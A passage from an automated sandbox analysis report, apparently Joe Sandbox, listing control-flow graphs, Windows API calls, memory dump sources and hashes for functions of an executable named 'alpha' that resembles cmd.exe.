704->705 709 7ff6eb185169-7ff6eb18516d 704->709 710 7ff6eb185172-7ff6eb1851af free call 7ff6eb188f80 705->710 711 7ff6eb185075 call 7ff6eb19cff0 706->711 712 7ff6eb185032-7ff6eb185059 GetStdHandle GetConsoleScreenBufferInfo 706->712 709->705 709->710 711->693 715 7ff6eb18505b-7ff6eb185067 712->715 716 7ff6eb185069-7ff6eb185073 712->716 715->693 716->693 716->711 729 7ff6eb1850dc-7ff6eb1850e6 GlobalFree 724->729 725->729 729->697
                                              APIs
                                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184D9A
                                                • Part of subcall function 00007FF6EB1858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6EB19C6DB), ref: 00007FF6EB1858EF
                                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184DBB
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB184DCA
                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184DE0
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB184DEE
                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E04
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB180589
                                                • Part of subcall function 00007FF6EB180580: SetConsoleMode.KERNELBASE ref: 00007FF6EB18059E
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB1805AF
                                                • Part of subcall function 00007FF6EB180580: GetConsoleMode.KERNELBASE ref: 00007FF6EB1805C5
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB1805EF
                                                • Part of subcall function 00007FF6EB180580: GetConsoleMode.KERNELBASE ref: 00007FF6EB180605
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB180632
                                                • Part of subcall function 00007FF6EB180580: SetConsoleMode.KERNELBASE ref: 00007FF6EB180647
                                                • Part of subcall function 00007FF6EB184A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A28
                                                • Part of subcall function 00007FF6EB184A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A66
                                                • Part of subcall function 00007FF6EB184A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A7D
                                                • Part of subcall function 00007FF6EB184A14: memmove.MSVCRT(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A9A
                                                • Part of subcall function 00007FF6EB184A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184AA2
                                                • Part of subcall function 00007FF6EB184AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AD6
                                                • Part of subcall function 00007FF6EB184AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AEF
                                                • Part of subcall function 00007FF6EB185554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6EB184E35), ref: 00007FF6EB1855DA
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185623
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185667
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB1856BE
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185702
                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E35
                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E81
                                              • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184F69
                                              • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184F95
                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FB0
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FC1
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FD8
                                              • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FF8
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185037
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18504B
                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB1850DF
                                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB1850F2
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18510F
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185130
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18514A
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185175
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressHandleProcProcess$AllocCommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireAllocateBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                              • API String ID: 3614140610-3021193919
                                              • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                              • Instruction ID: 4b63d6c709d74c5a591814c63b6cecdbe609902b7187e5c6718eac40140f7d97
                                              • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                              • Instruction Fuzzy Hash: 93C17223A08A42D6EA059B51F9503F977A0FF8DBB8F454134D90E877B5DF3EA409870A
                                              Function 00007FF6EB183C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 732 7ff6eb183c24-7ff6eb183c61 733 7ff6eb183c67-7ff6eb183c99 call 7ff6eb17af14 call 7ff6eb17ca40 732->733 734 7ff6eb18ec5a-7ff6eb18ec5f 732->734 743 7ff6eb18ec97-7ff6eb18eca1 call 7ff6eb18855c 733->743 744 7ff6eb183c9f-7ff6eb183cb2 call 7ff6eb17b900 733->744 734->733 736 7ff6eb18ec65-7ff6eb18ec6a 734->736 737 7ff6eb18412e-7ff6eb18415b call 7ff6eb188f80 736->737 744->743 749 7ff6eb183cb8-7ff6eb183cbc 744->749 750 7ff6eb183cbf-7ff6eb183cc7 749->750 750->750 751 7ff6eb183cc9-7ff6eb183ccd 750->751 752 7ff6eb183cd2-7ff6eb183cd8 751->752 753 7ff6eb183cda-7ff6eb183cdf 752->753 754 7ff6eb183ce5-7ff6eb183d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff6eb183faa-7ff6eb183fb3 753->755 756 7ff6eb183fb8 754->756 757 7ff6eb183d68-7ff6eb183d6c 754->757 755->752 759 7ff6eb183fc6-7ff6eb183fec GetLastError call 7ff6eb18855c call 7ff6eb18a5d6 756->759 757->756 758 7ff6eb183d72-7ff6eb183dcd towupper GetFullPathNameW 757->758 758->759 760 7ff6eb183dd3-7ff6eb183ddd 758->760 763 7ff6eb183ff1-7ff6eb184007 call 7ff6eb18855c _local_unwind 759->763 762 7ff6eb183de3-7ff6eb183dfb 760->762 760->763 765 7ff6eb183e01-7ff6eb183e11 762->765 766 7ff6eb1840fe-7ff6eb184119 call 7ff6eb18855c _local_unwind 762->766 774 7ff6eb18400c-7ff6eb184022 GetLastError 763->774 765->766 770 7ff6eb183e17-7ff6eb183e28 765->770 777 7ff6eb18411a-7ff6eb18412c call 7ff6eb17ff70 call 7ff6eb18855c 766->777 773 7ff6eb183e2c-7ff6eb183e34 770->773 773->773 778 7ff6eb183e36-7ff6eb183e3f 773->778 775 7ff6eb184028-7ff6eb18402b 774->775 776 7ff6eb183e95-7ff6eb183e9c 774->776 775->776 780 7ff6eb184031-7ff6eb184047 call 7ff6eb18855c _local_unwind 775->780 781 7ff6eb183ecf-7ff6eb183ed3 776->781 782 7ff6eb183e9e-7ff6eb183ec2 call 7ff6eb182978 776->782 777->737 779 7ff6eb183e42-7ff6eb183e55 778->779 784 7ff6eb183e57-7ff6eb183e60 779->784 785 7ff6eb183e66-7ff6eb183e8f GetFileAttributesW 779->785 799 7ff6eb18404c-7ff6eb184062 call 7ff6eb18855c _local_unwind 780->799 788 7ff6eb183f08-7ff6eb183f0b 781->788 789 7ff6eb183ed5-7ff6eb183ef7 GetFileAttributesW 781->789 793 7ff6eb183ec7-7ff6eb183ec9 782->793 784->785 791 7ff6eb183f9d-7ff6eb183fa5 784->791 785->774 785->776 797 7ff6eb183f0d-7ff6eb183f11 788->797 798 7ff6eb183f1e-7ff6eb183f40 SetCurrentDirectoryW 788->798 794 7ff6eb183efd-7ff6eb183f02 789->794 795 7ff6eb184067-7ff6eb184098 GetLastError call 7ff6eb18855c _local_unwind 789->795 791->779 793->781 793->799 794->788 801 7ff6eb18409d-7ff6eb1840b3 call 7ff6eb18855c _local_unwind 794->801 795->801 803 7ff6eb183f46-7ff6eb183f69 call 7ff6eb18498c 797->803 804 7ff6eb183f13-7ff6eb183f1c 797->804 798->803 805 7ff6eb1840b8-7ff6eb1840de GetLastError call 7ff6eb18855c _local_unwind 798->805 799->795 801->805 815 7ff6eb1840e3-7ff6eb1840f9 call 7ff6eb18855c _local_unwind 803->815 816 7ff6eb183f6f-7ff6eb183f98 call 7ff6eb18417c 803->816 804->798 804->803 805->815 815->766 816->777
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                              • String ID: :
                                              • API String ID: 1809961153-336475711
                                              • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                              • Instruction ID: 1f60cd9bbc0996f7414b361ea76b735bf15cc5d9726298aba7e651787a85e57c
                                              • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                              • Instruction Fuzzy Hash: 18D18F23A0CB8582EA20DB15E4443FAB7A1FB89768F444135E94E837B4EF3DE445CB46
                                              Function 00007FF6EB182394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 914 7ff6eb182394-7ff6eb182416 memset call 7ff6eb17ca40 917 7ff6eb18241c-7ff6eb182453 GetModuleFileNameW call 7ff6eb18081c 914->917 918 7ff6eb18e0d2-7ff6eb18e0da call 7ff6eb184c1c 914->918 923 7ff6eb18e0db-7ff6eb18e0ee call 7ff6eb18498c 917->923 924 7ff6eb182459-7ff6eb182468 call 7ff6eb18081c 917->924 918->923 929 7ff6eb18e0f4-7ff6eb18e107 call 7ff6eb18498c 923->929 924->929 930 7ff6eb18246e-7ff6eb18247d call 7ff6eb18081c 924->930 939 7ff6eb18e10d-7ff6eb18e123 929->939 935 7ff6eb182516-7ff6eb182529 call 7ff6eb18498c 930->935 936 7ff6eb182483-7ff6eb182492 call 7ff6eb18081c 930->936 935->936 936->939 947 7ff6eb182498-7ff6eb1824a7 call 7ff6eb18081c 936->947 942 7ff6eb18e13f-7ff6eb18e17a _wcsupr 939->942 943 7ff6eb18e125-7ff6eb18e139 wcschr 939->943 945 7ff6eb18e181-7ff6eb18e199 wcsrchr 942->945 946 7ff6eb18e17c-7ff6eb18e17f 942->946 943->942 944 7ff6eb18e27c 943->944 949 7ff6eb18e283-7ff6eb18e29b call 7ff6eb18498c 944->949 948 7ff6eb18e19c 945->948 946->948 956 7ff6eb1824ad-7ff6eb1824c5 call 7ff6eb183c24 947->956 957 7ff6eb18e2a1-7ff6eb18e2c3 _wcsicmp 947->957 951 7ff6eb18e1a0-7ff6eb18e1a7 948->951 949->957 951->951 954 7ff6eb18e1a9-7ff6eb18e1bb 951->954 958 7ff6eb18e1c1-7ff6eb18e1e6 954->958 959 7ff6eb18e264-7ff6eb18e277 call 7ff6eb181300 954->959 964 7ff6eb1824ca-7ff6eb1824db 956->964 962 7ff6eb18e1e8-7ff6eb18e1f1 958->962 963 7ff6eb18e21a 958->963 959->944 965 7ff6eb18e201-7ff6eb18e210 962->965 966 7ff6eb18e1f3-7ff6eb18e1f6 962->966 969 7ff6eb18e21d-7ff6eb18e21f 963->969 967 7ff6eb1824dd-7ff6eb1824e4 ??_V@YAXPEAX@Z 964->967 968 7ff6eb1824e9-7ff6eb182514 call 7ff6eb188f80 964->968 965->963 971 7ff6eb18e212-7ff6eb18e218 965->971 966->965 970 7ff6eb18e1f8-7ff6eb18e1ff 966->970 967->968 969->949 973 7ff6eb18e221-7ff6eb18e228 969->973 970->965 970->966 971->969 975 7ff6eb18e254-7ff6eb18e262 973->975 976 7ff6eb18e22a-7ff6eb18e231 973->976 975->944 977 7ff6eb18e234-7ff6eb18e237 976->977 977->975 978 7ff6eb18e239-7ff6eb18e242 977->978 978->975 979 7ff6eb18e244-7ff6eb18e252 978->979 979->975 979->977
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                              • API String ID: 2622545777-4197029667
                                              • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                              • Instruction ID: 6143400cad677a3334bf9ca6740809d1e8a5e01f72bdf39e781978dd1fa24f09
                                              • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                              • Instruction Fuzzy Hash: 89919263B09B8285EE258B50E8503F863A1FF4DBA8F444135C90E876B5DF3EE508C74A
                                              Function 00007FF6EB180580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleMode_get_osfhandle
                                              • String ID: CMD.EXE
                                              • API String ID: 1606018815-3025314500
                                              • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                              • Instruction ID: 870ec13ea2fa7a0c70a55e84f2c571c448913e349f6e48448700ccfb124cc7b3
                                              • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                              • Instruction Fuzzy Hash: D441C137A19642DBE6144B14E8553F87AA0FB8E779F558139C50EC2378DF3EB4188A0A
                                              Function 00007FF6EB17C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 992 7ff6eb17c620-7ff6eb17c66f GetConsoleTitleW 993 7ff6eb18c5f2 992->993 994 7ff6eb17c675-7ff6eb17c687 call 7ff6eb17af14 992->994 996 7ff6eb18c5fc-7ff6eb18c60c GetLastError 993->996 999 7ff6eb17c689 994->999 1000 7ff6eb17c68e-7ff6eb17c69d call 7ff6eb17ca40 994->1000 998 7ff6eb18c5e3 call 7ff6eb173278 996->998 1004 7ff6eb18c5e8-7ff6eb18c5ed call 7ff6eb18855c 998->1004 999->1000 1000->1004 1005 7ff6eb17c6a3-7ff6eb17c6ac 1000->1005 1004->993 1007 7ff6eb17c954-7ff6eb17c95e call 7ff6eb18291c 1005->1007 1008 7ff6eb17c6b2-7ff6eb17c6c5 call 7ff6eb17b9c0 1005->1008 1013 7ff6eb18c5de-7ff6eb18c5e0 1007->1013 1014 7ff6eb17c964-7ff6eb17c96b call 7ff6eb1789c0 1007->1014 1015 7ff6eb17c6cb-7ff6eb17c6ce 1008->1015 1016 7ff6eb17c9b5-7ff6eb17c9b8 call 7ff6eb185c6c 1008->1016 1013->998 1020 7ff6eb17c970-7ff6eb17c972 1014->1020 1015->1004 1018 7ff6eb17c6d4-7ff6eb17c6e9 1015->1018 1023 7ff6eb17c9bd-7ff6eb17c9c9 call 7ff6eb18855c 1016->1023 1021 7ff6eb18c616-7ff6eb18c620 call 7ff6eb18855c 1018->1021 1022 7ff6eb17c6ef-7ff6eb17c6fa 1018->1022 1020->996 1024 7ff6eb17c978-7ff6eb17c99a towupper 1020->1024 1025 7ff6eb18c627 1021->1025 1022->1025 1026 7ff6eb17c700-7ff6eb17c713 1022->1026 1037 7ff6eb17c9d0-7ff6eb17c9d7 1023->1037 1029 7ff6eb17c9a0-7ff6eb17c9a9 1024->1029 1030 7ff6eb18c631 1025->1030 1026->1030 1031 7ff6eb17c719-7ff6eb17c72c 1026->1031 1029->1029 1034 7ff6eb17c9ab-7ff6eb17c9af 1029->1034 1036 7ff6eb18c63b 1030->1036 1035 7ff6eb17c732-7ff6eb17c747 call 7ff6eb17d3f0 1031->1035 1031->1036 1034->1016 1038 7ff6eb18c60e-7ff6eb18c611 call 7ff6eb19ec14 1034->1038 1047 7ff6eb17c74d-7ff6eb17c750 1035->1047 1048 7ff6eb17c8ac-7ff6eb17c8af 1035->1048 1042 7ff6eb18c645 1036->1042 1040 7ff6eb17c9dd-7ff6eb18c6da SetConsoleTitleW 1037->1040 1041 7ff6eb17c872-7ff6eb17c8aa call 7ff6eb18855c call 7ff6eb188f80 1037->1041 1038->1021 1040->1041 1053 7ff6eb18c64e-7ff6eb18c651 1042->1053 1049 7ff6eb17c76a-7ff6eb17c76d 1047->1049 1050 7ff6eb17c752-7ff6eb17c764 call 7ff6eb17bd38 1047->1050 1048->1047 1052 7ff6eb17c8b5-7ff6eb17c8d3 wcsncmp 1048->1052 1056 7ff6eb17c773-7ff6eb17c77a 1049->1056 1057 7ff6eb17c840-7ff6eb17c84b call 7ff6eb17cb40 1049->1057 1050->1004 1050->1049 1052->1049 1058 7ff6eb17c8d9 1052->1058 1059 7ff6eb17c80d-7ff6eb17c811 1053->1059 1060 7ff6eb18c657-7ff6eb18c65b 1053->1060 1065 7ff6eb17c780-7ff6eb17c784 1056->1065 1077 7ff6eb17c84d-7ff6eb17c855 call 7ff6eb17cad4 1057->1077 1078 7ff6eb17c856-7ff6eb17c86c 1057->1078 1058->1047 1061 7ff6eb17c817-7ff6eb17c81b 1059->1061 1062 7ff6eb17c9e2-7ff6eb17c9e7 1059->1062 1060->1059 1067 7ff6eb17ca1b-7ff6eb17ca1f 1061->1067 1068 7ff6eb17c821 1061->1068 1062->1061 1069 7ff6eb17c9ed-7ff6eb17c9f7 call 7ff6eb18291c 1062->1069 1070 7ff6eb17c83d 1065->1070 1071 7ff6eb17c78a-7ff6eb17c7a4 wcschr 1065->1071 1067->1068 1079 7ff6eb17ca25-7ff6eb18c6b3 call 7ff6eb173278 1067->1079 1073 7ff6eb17c824-7ff6eb17c82d 1068->1073 1086 7ff6eb17c9fd-7ff6eb17ca00 1069->1086 1087 7ff6eb18c684-7ff6eb18c698 call 7ff6eb173278 1069->1087 1070->1057 1075 7ff6eb17c7aa-7ff6eb17c7ad 1071->1075 1076 7ff6eb17c8de-7ff6eb17c8f7 1071->1076 1073->1073 1080 7ff6eb17c82f-7ff6eb17c837 1073->1080 1082 7ff6eb17c7b0-7ff6eb17c7b8 1075->1082 1083 7ff6eb17c900-7ff6eb17c908 1076->1083 1077->1078 1078->1037 1078->1041 1079->1004 1080->1065 1080->1070 1082->1082 1088 7ff6eb17c7ba-7ff6eb17c7c7 1082->1088 1083->1083 1089 7ff6eb17c90a-7ff6eb17c915 1083->1089 1086->1061 1094 7ff6eb17ca06-7ff6eb17ca10 call 7ff6eb1789c0 1086->1094 1087->1004 1088->1053 1095 7ff6eb17c7cd-7ff6eb17c7db 1088->1095 1096 7ff6eb17c93a-7ff6eb17c944 1089->1096 1097 7ff6eb17c917 1089->1097 1094->1061 1111 7ff6eb17ca16-7ff6eb18c67f GetLastError call 7ff6eb173278 1094->1111 1100 7ff6eb17c7e0-7ff6eb17c7e7 1095->1100 1103 7ff6eb17ca2a-7ff6eb17ca2f call 7ff6eb189158 1096->1103 1104 7ff6eb17c94a 1096->1104 1101 7ff6eb17c920-7ff6eb17c928 1097->1101 1106 7ff6eb17c7e9-7ff6eb17c7f1 1100->1106 1107 7ff6eb17c800-7ff6eb17c803 1100->1107 1108 7ff6eb17c92a-7ff6eb17c92f 1101->1108 1109 7ff6eb17c932-7ff6eb17c938 1101->1109 1103->1013 1104->1007 1106->1107 1112 7ff6eb17c7f3-7ff6eb17c7fe 1106->1112 1107->1042 1113 7ff6eb17c809 1107->1113 1108->1109 1109->1096 1109->1101 1111->1004 1112->1100 1112->1107 1113->1059
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
